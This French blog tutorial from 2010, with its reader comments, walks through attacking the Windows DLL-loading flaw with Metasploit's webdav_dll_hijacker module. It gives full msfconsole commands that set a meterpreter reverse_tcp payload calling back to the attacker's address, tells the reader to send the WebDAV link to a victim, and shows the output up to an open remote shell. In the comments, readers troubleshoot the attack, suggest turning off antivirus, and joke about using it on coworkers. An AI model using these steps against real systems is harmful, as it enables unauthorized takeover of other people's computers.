Metasploit et les failles dans les fichiers DLL de Windows

Par Sébastien Bilbeau, publié le 25 août 2010

Windows
Une nouvelle faille de sécurité vient d'être découverte dans le système de chargement des DLL de Windows. Celle-ci peut permettre à une personne malveillante de prendre le contrôle d'un ordinateur à distance. Bien entendu, il est très facile de mettre en place ce genre d'attaque avec Metasploit et c'est ce que nous allons voir dans cet article.

Pour arriver à nos fins, nous allons utiliser le module "webdav_dll_hijacker" prévu à cet effet. Celui-ci permet de lancer un serveur Webdav avec un fichier PowerPoint infecté, portant le nom de presentation.ppt.

Voici les commandes à utiliser dans Metasploit (ici : 192.168.1.100 est la machine de l'attaquant) :

$ ./msfconsole
msf > use exploit/windows/browser/webdav_dll_hijacker
msf > show options
msf > set BASENAME "presentation"
msf > set EXTENSIONS "ppt"
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LPORT 9999
msf > set LHOST 192.168.1.100

Le module étant correctement configuré, nous pouvons lancer l'attaque :

msf > exploit
[*] Started reverse handler on 192.168.1.100:4444
[*]
[*] Exploit links are now available at \\192.168.1.100\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.100:80/
[*] Server started.

Un serveur webdav est alors démarré. Il faut ensuite envoyer l'adresse \\192.168.1.100\documents\ à une victime. Si la personne utilise cette dernière et ouvre le fichier presentation.ppt, avec son navigateur de fichiers ou Internet Explorer, Metasploit vous indiquera quelque chose comme ceci :

[*] GET => DATA (/documents/presentation.ppt)
[*] PROPFIND /documents/pp7x32.dll
[*] PROPFIND => 207 File (/documents/pp7x32.dll)
[*] GET => DLL Payload
[*] Sending stage (748544 bytes) to 192.168.1.106
[*] PROPFIND /documents/pp4x322.dll
[*] PROPFIND => 207 File (/documents/pp4x322.dll)
[*] GET => DLL Payload
[*] Sending stage (748544 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened...

Il ne restera plus qu'à prendre possession de la machine à distance :

msf exploit(webdav_dll_hijacker) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS>

Autres articles du même sujet

Dernières réactions
(S'abonner ...)

Inconnu: En parlant de gimp, savez-vous quand la version 2.8 va sortir (en stable) ? Merci.

franswar: @Loulou83 : Personnellement, je ne suis pas d’accord avec Toi. avec Gnome-Do que j’ai installé,...

Thibault: J’adore vraiment l’effet Staned Glass ! Vraiment magnifique ! Merci pour le partage

...

sl33k: Merci beaucoup c’est énorme, il y a vraiment plein d’effets pas mal en plus j’utilise...

binoyte: cool merci pour le lien.

Derniers Twitts
(S'abonner ...)

Tux-planet : G'MIC : utilisez de nombreux filtres prédéfinis sous The Gimp http://t.co/mjPTLTib

Tux-planet : GNOME : mockup de l'écran de verrouillage par Jakub... http://t.co/Fuqm6Fag

Tux-planet : Pour jailbreaker un iPhone 3G (version 4.2) il vaut mieux redsnow ou greenpoison ?

18 Commentaires pour "Metasploit et les failles dans les fichiers DLL de Windows"

Flux des commentaires de cet article Ajouter un commentaire

Mais je suis une personne malveillante...!
Répondre

inalgnu , le 25 août 2010 à 08:25
@inalgnu : je m'en doutais...
Répondre

Pti-seb , le 25 août 2010 à 12:27
Bien le bonjour !!
Sympa ce petit exploit pour embêter les gens au boulot

Petit problème pour ma part :s
Une fois "exploit" de terminé, msf me rend la main et une fois que j'ouvre le fameux fichier, rien ne se passe dans Metasploit :s

Une idée ?

Thanks

PS : Ptit-Seb continue ce site m'est vraiment utile à certains moment
Répondre

Popet , le 25 août 2010 à 14:02
@Popet : je vois pas trop. Si tu arrive à ouvrir le fichier, c'est que le serveur webdav est bien lancé. Normalement tu dois voir les GET, PROFIND défiler dans la console...

Sinon merci pour tes encouragements.
Répondre

pti-seb , le 25 août 2010 à 19:47
Hummm ça marche sur toutes les versions de Windows ? Ou que XP sp1-sp2 ?
Répondre

Muy_Bien , le 25 août 2010 à 22:19
@Muy_Bien : j'ai l'impression que cela touche toutes les versions de Windows. Mais bon j'ai pas trouvé d'informations là-dessus. Chez moi, j'ai testé avec un Windows XP SP3 et ça fonctionnait.
Répondre

pti-seb , le 26 août 2010 à 08:29
@pti-seb : peut être une réponse.
Répondre

Muy_Bien , le 26 août 2010 à 09:34
Salut à tous,

Cela fait que peu de temps que je connais ton blog mais j'y reviens toujours avec curiosité, je dois dire que ce "metasploit" est comme un "jouet" genre coffret du parfait petit pirate !!!

c'est la première fois que je le teste et après quelques ajustements (lancer avec sudo...), je suis sur le shell de mon XP .... c'est "top".

Par-contre, Antivir free détecte bien un troyen et j'ai du le faire taire à plusieurs reprises afin de faire fonctionner l'exploit.

Ciaoo et longue vie à Tuxplanet.
Répondre

Pafzedog , le 26 août 2010 à 10:07
Bien le bonjour à tous !

Ben pour ma part, le serveur démarre bien mais après rien...
En ouvrant le fichier sur plusieurs PC différents, rien ne se passe dans "msf"

Une idée ?
A+
Répondre

Popet , le 26 août 2010 à 14:21
@Muy_Bien : bon en faite la faille est plus lié aux logiciels qu'à la version de Windows. Visiblement, il y a déjà plus de 200 applications impactées.

@Pafzedog : bien il est sacrément efficace ton antivirus alors. Sinon, merci pour tes encouragements.

@Popet : tu utilise qu'elle distribution ? Car d'après @Pafzedog, sous Ubuntu il faut lancer metasploit avec sudo. Sinon les PC que tu test son sous qu'elle version de Windows ?
Répondre

pti-seb , le 26 août 2010 à 14:32
@pti-seb : Et bien c'est une Ubuntu 10.04 mais j'utilise bien sudo pour le lancement. Et la version de Windows et un petit XP SP2 tout ce qu'il y a de plus classique.
Voilà Voilà
Thanks
Répondre

Popet , le 26 août 2010 à 14:37
Testé sur un Windows 7, j'ai pas pu avoir un shell ... il faut dire aussi que ce Windows 7 n'est autre qu'une virtualisation dans un Windows Server ... ça fait peut etre beaucoup pour metasploit. Par contre msf m'affiche bien des lignes des que je clique sur le fichier en question dans Wx 7.

@Popet : Regarde que apache est arrété si tu l'as : sudo /etc/init.d/apache2 status
si oui alors arrete le : sudo /etc/init.d/apache2 stop
et réssaye.

Sinon il y a quoi comme commandes "rigolotes" pour un shell Windows ? Genre envoyer une notification, changer le fond d'écran ....
Répondre

Muy_Bien , le 26 août 2010 à 15:34
@Muy_Bien : pour le fond d'écran, il faut modifier la base de registre en ligne de commande. Tu devrais trouver cela facilement avec google.
Répondre

pti-seb , le 27 août 2010 à 15:44
Testé sur Vista+Avast. Avast détecte un cheval de troie et bloque l'attaque quand l'utilisateur clique sur le ppt. Comme quoi, un antivirus sous Windows est utile !!
Répondre

Popeye , le 29 août 2010 à 15:08
Salut !

merci pour ce tuto !

je suis en train de tester chez moi et apres avoir le ppt, les DLL payload se font correctement mais metasploit n'a pas l'impression d'avoir fini. il n'affiche pas :
"
[*] Sending stage (748544 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened...
"

je n'ai donc pas d'ID de session...

une idee? merci d'avance !
Répondre

Gogo , le 2 septembre 2010 à 18:09
sympa la technique merci du tuyau
Répondre

niceman , le 11 septembre 2010 à 21:00
salut tt le monde
j'ai essayer de demarrer un serveur webdav chez moi, mais ça pas march chez moi (
apres avoir terminer la configuration , qu'on je lance la cmd >exploit (sachant que mon adresse est 192.168.1.3) elle affiche:

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.3:9999
[*]
[*] Exploit links are now available at \\192.168.1.3\documents\
[*]
[-] Exploit exception: Permission denied - bind(2)

sachez bien que j'utilise la derniere version de ubuntu 11.04 !!
Répondre

oshiikaisuko , le 16 juillet 2011 à 14:29
@oshiikaisuko : tu ne dois pas avoir les permissions, tu es bien en root ?
Répondre

Booub , le 23 novembre 2011 à 15:30